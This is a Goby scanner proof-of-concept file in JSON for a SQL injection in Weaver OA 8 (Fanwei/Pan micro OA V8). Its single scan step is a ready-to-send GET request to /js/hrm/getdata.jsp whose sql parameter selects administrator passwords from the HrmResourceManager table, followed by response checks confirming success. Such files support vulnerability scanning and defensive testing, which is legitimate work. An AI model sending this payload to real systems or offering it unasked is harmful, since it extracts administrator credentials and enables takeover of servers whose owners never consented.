Goby/json/Weaver_OA_8_SQL_injection.json

71 lines
2.7 KiB
JSON

{
"Name": "Weaver OA 8 SQL injection",
"Level": "2",
"Tags": [
"SQL Injection"
],
"GobyQuery": "app=\"Weaver-OA\"",
"Description": "",
"Product": "Weaver OA 8",
"Homepage": "https://weaver.com/",
"Author": "",
"Impact": "There is a SQL injection vulnerability in Pan micro OA V8, through which an attacker can obtain administrator and server privileges.",
"Recommendation": "",
"References": [],
"HasExp": false,
"ExpParams": null,
"ExpTips": {
"Type": "",
"Content": ""
},
"ScanSteps": [
"AND",
{
"Request": {
"method": "GET",
"uri": "/js/hrm/getdata.jsp?cmd=getSelectAllId&sql=select%20password%20as%20id%20from%20HrmResourceManager",
"follow_redirect": false,
"header": null,
"data_type": "text",
"data": ""
},
"ResponseTest": {
"type": "group",
"operation": "AND",
"checks": [
{
"type": "item",
"variable": "$code",
"operation": "==",
"value": "200",
"bz": ""
},
{
"type": "item",
"variable": "$body",
"operation": "not contains",
"value": "404 Not Found",
"bz": ""
},
{
"type": "item",
"variable": "$body",
"operation": "not contains",
"value": "<html>",
"bz": ""
},
{
"type": "item",
"variable": "$body",
"operation": "contains",
"value": "script",
"bz": ""
}
]
},
"SetVariable": []
}
],
"PostTime": "0000-00-00 00:00:00",
"GobyVersion": "0.0.0"
}